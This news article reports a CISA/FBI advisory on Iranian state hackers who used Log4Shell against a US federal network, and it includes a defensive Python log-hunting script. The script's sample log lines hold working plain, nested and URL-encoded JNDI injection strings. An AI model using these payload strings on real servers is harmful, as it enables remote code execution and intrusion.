Posted on November 20, 2022 at 6:50 PM
Iranian Hackers Hit Domain Controller of US Federal Network Through Log4Shell Flaws
CISA and the FBI revealed in a joint Cybersecurity Advisory that an Iranian government-sponsored hacking group infiltrated a Federal Civilian Executive Branch (FCEB) organization and planted XMRig cryptomining malware.
The threat actors gained access to the federal network by exploiting an unpatched VMware Horizon server, using the Log4Shell remote code execution vulnerability tracked as CVE-2021-44228.
The Hackers Set Up Reverse Proxies On Exposed Servers
The advisory notes that after planting the cryptocurrency miner, the Iran-backed threat actors moved laterally to the domain controller and set up reverse proxies on several compromised hosts to maintain persistent access to the network.
The two U.S. agencies stated that organizations that have not yet patched their VMware systems against Log4Shell should assume they have been compromised, and should begin hunting for malicious activity in their networks immediately to limit the duration and impact of any intrusion.
Earlier, in June, CISA warned that VMware Horizon and Unified Access Gateway (UAG) servers were still being attacked by multiple threat actors, including state-backed groups, using Log4Shell exploits.
Log4Shell, disclosed as a zero-day in December 2021, is a vulnerability in the widely used Java logging library Apache Log4j 2 that allows unauthenticated remote code execution: an attacker places a crafted string such as a JNDI lookup into any input the application logs, and a vulnerable Log4j version resolves the lookup and loads attacker-supplied code. Because so many products embed Log4j, the flaw affects VMware Horizon and a wide range of other software.
Log4Shell can be exploited remotely against vulnerable servers that are exposed to the internet, and attackers use that initial foothold to reach internal systems that hold sensitive data.
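Because the exploit string has to be logged to fire, exploitation attempts usually leave the lookup in web-server access logs, which is where the hunt the agencies recommend can start. The following is an added example, not code from the CISA/FBI advisory or from this article: a small Python script that collapses the obfuscation tricks scanners use (nested lookups, default-value syntax, URL encoding) the way Log4j itself would, then flags any request carrying a JNDI lookup with a network scheme. The log lines are constructed for illustration and use RFC 5737 documentation addresses.

```python
"""
Hunt for Log4Shell (CVE-2021-44228) exploitation attempts in web-server access logs.

The attack works by getting a string such as  ${jndi:ldap://attacker/x}  into any
field a vulnerable Log4j 2 instance logs (User-Agent, request path, a header).
Log4j resolves the JNDI lookup and loads attacker-supplied code. Scanners hide the
lookup from naive pattern matching with nested lookups, for example
    ${${lower:j}ndi:ldap://...}    ${${::-j}${::-n}${::-d}${::-i}:rmi://...}
    ${${env:NaN:-j}ndi:ldaps://...}    plus URL encoding of the whole string,
so this detector first collapses those layers, then looks for a resolved lookup.
"""
import re
import urllib.parse

# An innermost ${...} expression, i.e. one containing no further "${".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup with a protocol scheme; captures the scheme and the target.
_JNDI = re.compile(r"""jndi:(ldaps?|rmi|dns|iiop|corba|nis|nds|http)://([^\s"'}]*)""", re.I)


def _resolve_one(body):
    """Emulate the Log4j lookups scanners abuse for obfuscation.

    Returns the replacement text, or None when the expression is itself the
    JNDI payload and must be left in place for the detector.
    """
    if body.lower().startswith("jndi:"):
        return None
    # Default-value syntax "${prefix:name:-default}" (also "${::-x}"): Log4j falls
    # back to the default when the lookup is empty or unknown, so take the default.
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, arg = body.partition(":")
    if sep and prefix.lower() == "lower":
        return arg.lower()
    if sep and prefix.lower() == "upper":
        return arg.upper()
    # Any other lookup (ctx:, env:, sys:, hostName, ...) has no value we can know
    # offline; dropping it keeps the surrounding payload intact for matching.
    return ""


def normalise(text, max_rounds=32):
    """URL-decode (repeatedly) and collapse nested ${...} lookups from the inside out."""
    while True:  # scanners sometimes double-encode
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded

    def repl(match):
        resolved = _resolve_one(match.group(1))
        return match.group(0) if resolved is None else resolved

    for _ in range(max_rounds):  # bound the work so a hostile line cannot spin us
        collapsed = _INNER.sub(repl, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def scan_line(line):
    """Return (scheme, target) for a JNDI lookup found after de-obfuscation, else None."""
    m = _JNDI.search(normalise(line))
    return (m.group(1).lower(), m.group(2)) if m else None


def hunt(lines):
    """Return [(line_number, (scheme, target)), ...] for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        hit = scan_line(line)
        if hit:
            hits.append((number, hit))
    return hits


# Constructed sample access-log lines (RFC 5737 documentation addresses), not real data.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Nov/2022:10:01:02 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [16/Nov/2022:10:01:09 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 5123 "-" "${jndi:ldap://198.51.100.23:1389/Exploit}"',
    '198.51.100.23 - - [16/Nov/2022:10:01:15 +0000] "GET /?x=${${lower:j}${::-n}di:${lower:rmi}://198.51.100.23:1099/a} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '198.51.100.23 - - [16/Nov/2022:10:01:21 +0000] "GET / HTTP/1.1" 200 12 "%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%3Aldaps%3A%2F%2F198.51.100.23%2Fb%7D" "-"',
    '203.0.113.9 - - [16/Nov/2022:10:02:00 +0000] "GET /docs/log4j-jndi-lookup.html HTTP/1.1" 200 800 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, (scheme, target) in hunt(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup via {scheme} -> {target}")
```

The normalisation step is what matters: matching the literal string `jndi:` alone misses the nested-lookup forms, while matching `${` alone floods the queue with benign templating. Collapsing inner lookups first and stopping only at a `jndi:` body gives a single pattern that catches the plain, nested, defaulted and URL-encoded variants without flagging a page that merely mentions Log4j.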
The Hackers Were Targeting Unpatched Systems
Log4Shell was publicly disclosed in December 2021, and within days a range of threat actors were found scanning for and exploiting systems that had not yet been patched. They included state-backed groups from North Korea, Iran, China, and Turkey, as well as initial access brokers with close links to ransomware groups.
Vulnerability disclosures are meant to prompt system and server owners to patch before exploitation begins. In practice, however, many organizations were unable to patch and update their systems before threat actors began preying on vulnerable ones.
CISA has advised organizations that have not patched to carry out a thorough hunt across their systems to root out any malware hiding in their networks.
In January, once patches were available, VMware urged customers to secure their Horizon servers against threat actors seeking to exploit the vulnerability.
Apart from Iran-sponsored hackers, Chinese-speaking actors have also targeted internet-exposed VMware Horizon servers; in incidents reported by researchers, they deployed Night Sky ransomware and backdoors. The Iranian-aligned TunnelVision group and North Korea's Lazarus APT have likewise turned their tooling against Horizon servers.
Organizations Should Apply Defensive Measures
In the recent advisory, the FBI and CISA strongly urged organizations to apply the recommended defensive measures and mitigations to protect against these threat actors.
The advice includes:
Validating and testing the organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in the CSA.
Updating affected VMware Horizon and Unified Access Gateway (UAG) systems to the latest version.
Minimizing the internet-facing attack surface, avoiding exposing systems to the internet wherever possible so they stay out of reach of threat actors.
Continually testing existing network security controls against the ATT&CK techniques described in the advisory. Organizations that routinely exercise their defenses against these techniques are better equipped to respond when the threat actors come calling.
Last year, CISA warned that Log4Shell could affect hundreds of millions of devices. The recent intrusion shows that threat actors remain well aware of the opportunity presented by systems that are still unpatched.
While many organizations moved swiftly to mitigate the vulnerability, threat actors moved just as quickly against those that could not.
The Iranian hackers may also have attacked the Merit Systems Protection Board. The advisory underscores the need for firmer action against the threat this vulnerability still poses.